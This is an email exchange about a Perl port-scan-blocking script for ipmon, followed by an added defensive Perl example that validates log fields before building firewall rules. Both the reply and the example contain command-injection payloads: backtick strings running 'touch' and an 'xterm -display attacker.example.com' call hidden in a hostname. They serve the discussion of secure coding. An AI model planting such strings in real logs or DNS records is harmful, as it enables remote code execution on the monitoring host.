Hi Jefferson,

Thank you for your reply, and an interesting point. 

I verified that an entry with backticks in the ipmon
log file doesn't execute by echoing a line:

17/06/2005 09:16:42.519563 fxp0 @0:48 b 81.`touch
/hi`.120.46,1364 -> 216.34.`touch /bye`.168,139 PR tcp
len 20 48 -S 2163595220 0 65535 IN

Just to make sure, I'll include the -T switch with the
interpreter, and add a line:

$line_orig =~ s/\`//g; just after it reads in the
line.

Also, there should be support for hostname resolution
or IP addresses, rather than just IP addresses. I'll
add that in.

Sentrytools is an interesting project. The concept of
the MOAN project is to provide a small base Perl
script, rather than C, for people who want a port scan
detection function, or to be able to easily branch off
and write functions for other network events using
Perl. 

Again, thank you for your input.

Regards,

Dan Sopher


--- Jefferson Ogata <[EMAIL PROTECTED]> wrote:

> Dan S wrote:
> > Hi. I'm not sure if my last email went through
> > correctly, so please excuse this if it's a repost.
> I
> > uploaded a Perl script that works with ipmon and
> log
> > rules. It detects port scans, and enters the IP
> > address into the rules file, and dynamically
> blocks
> > the host. If you are interested, the script is on
> > sourceforge at:
> 
> You might want to consider what happens if someone
> has hostname
> resolution enabled in ipmon, starts running this
> script (admittedly it
> won't work well if ipmon is logging hostnames, but
> someone might not
> realize that), and an attacker performs a portscan
> from an IP that
> resolves to, say, 123."`xterm -display
> attacker.example.com:0.0`".example.com...
> 
> You also might want to have a look at portsentry if
> you're not familiar
> with it.
> 
>     http://sourceforge.net/projects/sentrytools/
> 
> -- 
> Jefferson Ogata <[EMAIL PROTECTED]>
> NOAA Computer Incident Response Team (N-CIRT)
> <[EMAIL PROTECTED]>
> 
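The risk discussed in this thread is that a field from the ipmon log (a source address or a resolved hostname) ends up inside a shell command built by the script. Below is an added example, written for this page and not part of Dan Sopher's MOAN script or Jefferson Ogata's reply, showing the defensive pattern: parse the source field out of an ipmon line, accept it only if it is a strict dotted-quad IPv4 address (an allowlist, which also untaints it under -T), and build the ipf rule from that validated value without ever invoking a shell. The log lines are constructed for the example and reuse the payloads quoted in the thread; the ipmon field layout follows the sample line above, and the ipf rule text is an assumption.

```perl
#!/usr/bin/perl -T
# Added example, not the MOAN project's code. Parses ipmon log lines and
# extracts a source address that is safe to use in a block rule.
use strict;
use warnings;

# Constructed sample lines. The first is benign; the second carries the
# backtick payload from the thread; the third is what ipmon would print with
# hostname resolution enabled and a hostile PTR record.
my @lines = (
  '17/06/2005 09:16:42.519563 fxp0 @0:48 b 10.0.0.5,1364 -> 192.0.2.10,139 PR tcp len 20 48 -S 2163595220 0 65535 IN',
  '17/06/2005 09:16:42.519563 fxp0 @0:48 b 81.`touch /hi`.120.46,1364 -> 216.34.`touch /bye`.168,139 PR tcp len 20 48 -S 2163595220 0 65535 IN',
  '17/06/2005 09:16:42.519563 fxp0 @0:48 b 123."`xterm -display attacker.example.com:0.0`".example.com,1364 -> 192.0.2.10,139 PR tcp len 20 48 -S 2163595220 0 65535 IN',
);

# Strict IPv4 allowlist: four decimal octets, each 0..255. Returns the
# address or undef. Under -T the regex capture is what clears the taint
# flag, so only a value that passed this check can reach the rule builder.
sub untaint_ipv4 {
    my ($s) = @_;
    return undef unless defined $s;
    return undef unless $s =~ /\A((?:\d{1,3}\.){3}\d{1,3})\z/;
    my $ip = $1;
    for my $octet (split /\./, $ip) {
        return undef if $octet > 255;
    }
    return $ip;
}

# Pull the source host out of an ipmon line: the token just before " -> ",
# minus its ",port" suffix. If the field contains spaces (as the backtick
# payload does) the token will be garbage, and the allowlist rejects it.
sub parse_source {
    my ($line) = @_;
    my ($left, $right) = split / -> /, $line, 2;
    return undef unless defined $right;
    my @f = split ' ', $left;
    my ($host) = $f[-1] =~ /\A(.*),\d+\z/;
    return $host;
}

# The rule is built only from an address that untaint_ipv4 returned.
# (ipf rule syntax here is an assumption for the example.)
sub block_rule {
    my ($ip) = @_;
    return "block in quick from $ip to any\n";
}

for my $line (@lines) {
    my $host = parse_source($line);
    my $ip   = untaint_ipv4($host);
    if (defined $ip) {
        print "rule: ", block_rule($ip);
        # To load the rule, open the ipf binary with a list-form pipe so no
        # shell parses the text (hypothetical call, ipf not run here):
        # open(my $ipf, '|-', 'ipf', '-f', '-') or die "ipf: $!";
        # print $ipf block_rule($ip); close $ipf;
    } else {
        # Escape non-printables before echoing attacker-controlled bytes.
        (my $shown = defined $host ? $host : '<unparsed>') =~ s/[^\x20-\x7e]/?/g;
        print "rejected source field: $shown\n";
    }
}
```

Running this prints one rule for the benign line and rejects the other two. The point of the allowlist is that it does not matter which metacharacter an attacker chooses: a rule that only ever contains a validated dotted quad, passed to ipf through a list-form open rather than a shell string, has no command-injection surface, whereas stripping a single character such as the backtick leaves every other shell construct in play. If the script is meant to handle ipmon output with hostname resolution on, the same shape applies: resolve the name back to an address under the script's control and validate that, rather than writing the logged name into a rule.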


